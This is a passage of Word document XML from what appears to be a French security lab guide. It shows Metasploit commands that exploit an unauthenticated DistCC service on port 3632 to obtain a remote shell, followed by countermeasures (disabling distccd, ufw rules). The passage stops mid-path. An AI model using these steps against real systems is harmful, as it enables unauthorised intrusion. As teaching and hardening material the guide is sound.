      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D02B464" w14:textId="77777777" w:rsidR="00ED5CA3" w:rsidRDefault="00ED5CA3" w:rsidP="00ED5CA3">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00ED5CA3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D06BD2A" wp14:editId="02AF1D84">
            <wp:extent cx="5760720" cy="2100580"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="76754647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46477" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="2100580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF3957" w14:textId="24C98F40" w:rsidR="00AE68D0" w:rsidRDefault="00ED5CA3" w:rsidP="00ED5CA3">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : Ici le port est bien ouvert par exemple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789A4DD9" w14:textId="77777777" w:rsidR="00D42D95" w:rsidRDefault="00D42D95">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA4167A" w14:textId="641444A5" w:rsidR="00ED5CA3" w:rsidRDefault="00D42D95" w:rsidP="00ED5CA3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Lançons Metasploit depuis Kali maintenant et chercher les modules disponibles sur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>distc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> avec la commande : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE2C070" w14:textId="10CE0711" w:rsidR="00D42D95" w:rsidRDefault="00D42D95" w:rsidP="00D42D95">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> _____________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F27A99" w14:textId="77777777" w:rsidR="00D42D95" w:rsidRDefault="00D42D95" w:rsidP="00D42D95">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="330BC80B" w14:textId="77777777" w:rsidR="00D42D95" w:rsidRDefault="00D42D95" w:rsidP="00D42D95">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00D42D95">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C69A329" wp14:editId="2438438A">
            <wp:extent cx="5760720" cy="1290320"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5080"/>
            <wp:docPr id="88516234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62340" name="Image 1" descr="Une image contenant texte, capture d’écran&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5775725" cy="1293681"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08450876" w14:textId="5EBA8BA4" w:rsidR="00D42D95" w:rsidRDefault="00D42D95" w:rsidP="00D42D95">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>47</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : Résultat de la recherche</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147C26EE" w14:textId="731621A3" w:rsidR="00D42D95" w:rsidRDefault="00D42D95" w:rsidP="00D42D95">
      <w:r>
        <w:t xml:space="preserve">Puis chargez le module avec la commande : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5478A0E2" w14:textId="1940D049" w:rsidR="00D42D95" w:rsidRDefault="00D42D95" w:rsidP="00D42D95">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>Use NOM_DE_L_EXPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563D0377" w14:textId="77777777" w:rsidR="00D42D95" w:rsidRDefault="00D42D95" w:rsidP="00D42D95"/>
    <w:p w14:paraId="6CA8624A" w14:textId="77777777" w:rsidR="00C86E87" w:rsidRDefault="00C86E87" w:rsidP="00C86E87">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00C86E87">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00AFCB27" wp14:editId="1FB2C50B">
            <wp:extent cx="5760720" cy="382270"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="18883940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94032" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5838540" cy="387434"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4337DA0C" w14:textId="6E2F8E21" w:rsidR="00D42D95" w:rsidRDefault="00C86E87" w:rsidP="00C86E87">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>48</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : utilisation de la commande</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1749A5" w14:textId="77777777" w:rsidR="00C86E87" w:rsidRDefault="00C86E87" w:rsidP="00C86E87"/>
    <w:p w14:paraId="3EBA05E5" w14:textId="1600084F" w:rsidR="00C86E87" w:rsidRDefault="00C86E87" w:rsidP="00C86E87">
      <w:r>
        <w:t xml:space="preserve">Configurez la cible avec les commandes suivantes : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C363C05" w14:textId="5BD5351B" w:rsidR="00C86E87" w:rsidRDefault="00C86E87" w:rsidP="00C86E87">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>set RHOST _______</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E926B5" w14:textId="7F44862E" w:rsidR="00C86E87" w:rsidRDefault="00C86E87" w:rsidP="00C86E87">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>set RPORT 3632</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D1A32F" w14:textId="77777777" w:rsidR="00C86E87" w:rsidRDefault="00C86E87" w:rsidP="00C86E87">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28769A12" w14:textId="5A3B75B9" w:rsidR="00C86E87" w:rsidRDefault="00C86E87" w:rsidP="00C86E87">
      <w:r>
        <w:t xml:space="preserve">Configurez votre IP machine et votre port avec les commandes suivantes : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0768E524" w14:textId="7E5277CC" w:rsidR="00C86E87" w:rsidRDefault="00C86E87" w:rsidP="00C86E87">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>set LHOST ______</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F6CDD0" w14:textId="7F668184" w:rsidR="00C86E87" w:rsidRDefault="00C86E87" w:rsidP="00C86E87">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>set LPORT 6666</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B3E6A3" w14:textId="77777777" w:rsidR="00C86E87" w:rsidRDefault="00C86E87" w:rsidP="00C86E87">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2937F323" w14:textId="416A85C6" w:rsidR="00C86E87" w:rsidRDefault="00C86E87" w:rsidP="00C86E87">
      <w:r>
        <w:t>Puis lancez l’exploit avec la commande run :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07673BA3" w14:textId="3962CA70" w:rsidR="00C86E87" w:rsidRDefault="00C86E87" w:rsidP="00C86E87">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F7F93E" w14:textId="77777777" w:rsidR="00C86E87" w:rsidRDefault="00C86E87" w:rsidP="00C86E87">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00C86E87">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06BF7280" wp14:editId="1A3B9C54">
            <wp:extent cx="5783573" cy="1192306"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="45316382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63821" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5845961" cy="1205167"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="496DA90B" w14:textId="4EF53F31" w:rsidR="00C86E87" w:rsidRDefault="00C86E87" w:rsidP="00C86E87">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>49</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t> : comment lancer l’exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50790DEC" w14:textId="7BE90858" w:rsidR="00C577E1" w:rsidRDefault="00C577E1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F22343" w14:textId="77777777" w:rsidR="00C577E1" w:rsidRDefault="00C577E1" w:rsidP="00C577E1"/>
    <w:p w14:paraId="6404EE1E" w14:textId="75032FB5" w:rsidR="00C577E1" w:rsidRDefault="00C577E1" w:rsidP="00C577E1">
      <w:r>
        <w:t xml:space="preserve">Tu devrais maintenant avoir un shell ! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C544D7" w14:textId="77777777" w:rsidR="00C577E1" w:rsidRDefault="00C577E1" w:rsidP="00C577E1"/>
    <w:p w14:paraId="1A442815" w14:textId="351801D9" w:rsidR="00C577E1" w:rsidRDefault="00790FDD" w:rsidP="00C577E1">
      <w:r>
        <w:t>Utilise</w:t>
      </w:r>
      <w:r w:rsidR="00C577E1">
        <w:t xml:space="preserve"> les commandes suivantes pour le tester :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124E1B1D" w14:textId="77777777" w:rsidR="00C577E1" w:rsidRDefault="00C577E1" w:rsidP="00C577E1"/>
    <w:p w14:paraId="267C9170" w14:textId="5FB22AC5" w:rsidR="00C577E1" w:rsidRDefault="00C577E1" w:rsidP="00C577E1">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E735B30" w14:textId="6CF050AD" w:rsidR="00C577E1" w:rsidRDefault="00914CA9" w:rsidP="00C577E1">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00C577E1">
        <w:t>name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C577E1">
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7655E621" w14:textId="77777777" w:rsidR="00C577E1" w:rsidRDefault="00C577E1" w:rsidP="00C577E1"/>
    <w:p w14:paraId="020F0F96" w14:textId="1AFD8DBF" w:rsidR="00C577E1" w:rsidRDefault="00C577E1" w:rsidP="00C577E1"/>
    <w:p w14:paraId="33860C8F" w14:textId="10693B52" w:rsidR="00C577E1" w:rsidRPr="00C577E1" w:rsidRDefault="00C577E1" w:rsidP="00C577E1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C577E1">
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3015770E" wp14:editId="70E1F120">
            <wp:extent cx="5760720" cy="1210945"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="187828721" name="Image 1"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8721" name="Image 1" descr="Une image contenant texte, capture d’écran, Police, noir&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="1210945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BCAFCC" w14:textId="77777777" w:rsidR="00D42D95" w:rsidRDefault="00D42D95" w:rsidP="00D42D95">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19AFFC43" w14:textId="68F3E81A" w:rsidR="00D42D95" w:rsidRDefault="006E0AA7" w:rsidP="006E0AA7">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc197957022"/>
      <w:r>
        <w:t>Quelles-sont les différentes contre-mesures à mettre en place pour éviter la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>réalisation de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r>
        <w:t> ?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="02EAD82C" w14:textId="77777777" w:rsidR="006E0AA7" w:rsidRPr="006E0AA7" w:rsidRDefault="006E0AA7" w:rsidP="006E0AA7">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7036D744" w14:textId="73CFCBEF" w:rsidR="00D42D95" w:rsidRDefault="006E0AA7" w:rsidP="006E0AA7">
      <w:r>
        <w:t>Cet exploit cible le service DistCC qui est un outil de compilation distribuée. Lorsqu’il est mal configuré, il permet l’exécution de commandes à distance sans authentification. Voyons les contre-mesures que nous pouvons prendre pour éviter cet exploit :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E37319E" w14:textId="77777777" w:rsidR="006E0AA7" w:rsidRDefault="006E0AA7" w:rsidP="006E0AA7"/>
    <w:p w14:paraId="06C5E57C" w14:textId="2923C96B" w:rsidR="006E0AA7" w:rsidRPr="006E0AA7" w:rsidRDefault="006E0AA7" w:rsidP="006E0AA7">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc197957023"/>
      <w:r w:rsidRPr="006E0AA7">
        <w:t>Désactiver DistCC s’il n’est pas inutile :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="2F9AB71D" w14:textId="09E7447F" w:rsidR="006E0AA7" w:rsidRDefault="006E0AA7" w:rsidP="006E0AA7"/>
    <w:p w14:paraId="208CCB8A" w14:textId="2205CD45" w:rsidR="006E0AA7" w:rsidRDefault="006E0AA7" w:rsidP="006E0AA7">
      <w:r>
        <w:t xml:space="preserve">Si DistCC n’est pas utilisé dans notre environnement, on peut le désinstaller ou désactiver son service (c’est radical), pour cela on peut utiliser les commandes suivantes : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54108D0F" w14:textId="60A05C97" w:rsidR="006E0AA7" w:rsidRPr="00A74A85" w:rsidRDefault="006E0AA7" w:rsidP="006E0AA7">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A74A85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A74A85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A74A85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> disable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A74A85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>distccd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22C6F7A5" w14:textId="54737435" w:rsidR="006E0AA7" w:rsidRPr="00A74A85" w:rsidRDefault="006E0AA7" w:rsidP="006E0AA7">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A74A85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A74A85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A74A85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> stop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A74A85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>distccd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DB9EC86" w14:textId="77777777" w:rsidR="006E0AA7" w:rsidRPr="00A74A85" w:rsidRDefault="006E0AA7" w:rsidP="006E0AA7">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0517DF38" w14:textId="77777777" w:rsidR="006E0AA7" w:rsidRPr="00A74A85" w:rsidRDefault="006E0AA7" w:rsidP="006E0AA7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C191133" w14:textId="3CC329BE" w:rsidR="006E0AA7" w:rsidRDefault="006E0AA7" w:rsidP="00AF4E1F">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc197957024"/>
      <w:r>
        <w:t>Restreindre l’accès réseau :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="617ABCA6" w14:textId="1D6DEFE3" w:rsidR="00AF4E1F" w:rsidRDefault="00AF4E1F" w:rsidP="00AF4E1F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">On peut limiter l’accès au port 3632 uniquement aux machines qu’on autorise avec la commande suivante : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0225198F" w14:textId="77777777" w:rsidR="00AF4E1F" w:rsidRDefault="00AF4E1F" w:rsidP="00AF4E1F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E48F6A" w14:textId="199F6574" w:rsidR="00AF4E1F" w:rsidRPr="00AF4E1F" w:rsidRDefault="00AF4E1F" w:rsidP="00AF4E1F">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF4E1F">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF4E1F">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF4E1F">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> deny 3632/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171A7CB5" w14:textId="6EC2A4E0" w:rsidR="00AF4E1F" w:rsidRDefault="00AF4E1F" w:rsidP="00AF4E1F">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF4E1F">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF4E1F">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF4E1F">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>MACHINE_QUE_L_ON_AUTORISE to any port 3632</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683E6A2C" w14:textId="77777777" w:rsidR="00AF4E1F" w:rsidRDefault="00AF4E1F" w:rsidP="00AF4E1F">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="595F3F24" w14:textId="29ED4F1A" w:rsidR="00AF4E1F" w:rsidRDefault="00AF4E1F" w:rsidP="00AF4E1F">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc197957025"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Configurer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Distcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="364A68E5" w14:textId="78827D14" w:rsidR="00AF4E1F" w:rsidRDefault="00AF4E1F" w:rsidP="00AF4E1F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF4E1F">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">On peut éditer le fichier </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF4E1F">
        <w:rPr>
          <w:rStyle w:val="SansinterligneCar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF4E1F">
        <w:rPr>
          <w:rStyle w:val="SansinterligneCar"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
